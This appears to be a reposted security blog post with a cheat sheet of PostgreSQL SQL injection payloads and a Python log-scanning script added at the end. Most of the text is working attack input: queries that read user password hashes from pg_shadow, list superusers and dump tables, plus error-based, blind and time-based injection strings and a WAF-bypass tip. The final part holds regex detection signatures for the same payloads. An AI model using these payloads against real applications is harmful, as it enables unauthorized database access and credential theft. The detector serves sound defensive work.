
PostgreSQL Database SQL Injection Methods: A Complete Collection

2020-10-25 10:13


0x00 Sqli

1. Comments

--
/**/

2. Query the version

SELECT version()

3. Query the current user

SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();

4. List users

SELECT usename FROM pg_user

5. List user password hashes

SELECT usename, passwd FROM pg_shadow

6. List database administrator (superuser) accounts

SELECT usename FROM pg_user WHERE usesuper IS TRUE

7. List privileges

SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user

8. Get the current database name

SELECT current_database()

9. List databases

SELECT datname FROM pg_database

10. List table names

SELECT table_name FROM information_schema.tables

11. List column names

SELECT column_name FROM information_schema.columns WHERE table_name='data_table'

12. Error-based injection

,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)

' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1
' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1

13. XML helpers

select query_to_xml('select * from pg_user',true,true,''); -- returns every row of the result in one value, so it can be used inside error-based injection; the query argument only needs to be a string, so it can be assembled by concatenation and similar tricks to get past a WAF
select database_to_xml(true,true,''); -- dump the current database to XML
select database_to_xmlschema(true,true,''); -- dump the current db to an XML schema

14. Blind injection

' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK
' and substr(version(),1,10) = 'PostgreXXX' and '1 -> KO

15. Time-based injection

AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
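On the defensive side, the payload families above leave recognisable traces in web access logs. The following detection script is an added example and is not part of the original post; the signature names, the log-line format and the sample log entries are constructed for illustration, and the normalisation step undoes the URL-encoding and mixed-case tricks the payloads rely on before matching.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the payload families listed above (error-based cast, timing
# functions, catalog/information_schema enumeration, XML dump helpers).
SIGNATURES = {
    "error_based_cast": re.compile(r"\bcast\s*\(.*?\bas\s+(?:numeric|int)\b", re.S),
    "time_based_pg_sleep": re.compile(r"\bpg_sleep\s*\("),
    "time_based_generate_series": re.compile(r"\bgenerate_series\s*\("),
    "catalog_probe": re.compile(r"\b(?:pg_shadow|pg_user|pg_database|information_schema\.(?:tables|columns))\b"),
    "xml_dump": re.compile(r"\b(?:query_to_xml|database_to_xml(?:schema)?)\s*\("),
    "version_probe": re.compile(r"\bversion\s*\(\s*\)"),
}

# Constructed sample log lines (Apache combined-style); not from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Oct/2020:10:13:00 +0800] "GET /item?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [25/Oct/2020:10:13:02 +0800] "GET /item?id=1,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC) HTTP/1.1" 500 233
10.0.0.7 - - [25/Oct/2020:10:13:05 +0800] "GET /item?id=1'%20and%201=cast((SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%201%20OFFSET%200)%20as%20int)%20and%20'1'='1 HTTP/1.1" 500 240
10.0.0.9 - - [25/Oct/2020:10:13:09 +0800] "GET /item?id=1%20AND%2042=(SELECT%2042%20FROM%20PG_SLEEP(5)) HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

def normalize(raw):
    """Decode URL encoding twice (+ and %XX, tolerating double encoding),
    collapse whitespace and lowercase, so the mixed-case and '+' tricks
    in the payloads above cannot hide them from the signatures."""
    text = unquote_plus(unquote_plus(raw))
    return re.sub(r"\s+", " ", text).lower()

def classify(raw):
    """Return the names of all signatures matching one request string."""
    text = normalize(raw)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan_access_log(lines):
    """Return one finding dict per log line whose request matches a signature."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, path = m.groups()
        tags = classify(path)
        if tags:
            findings.append({"client": client, "path": path, "tags": tags})
    return findings
```

Calling scan_access_log(SAMPLE_LOG.splitlines()) flags the three probing requests and leaves the plain id=1 request alone; in production the same normalisation belongs in front of any WAF rule, since the raw, un-decoded query string is what the mixed-case and '+' variants are designed to slip past.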


Source: https://www.secvery.com/3131.html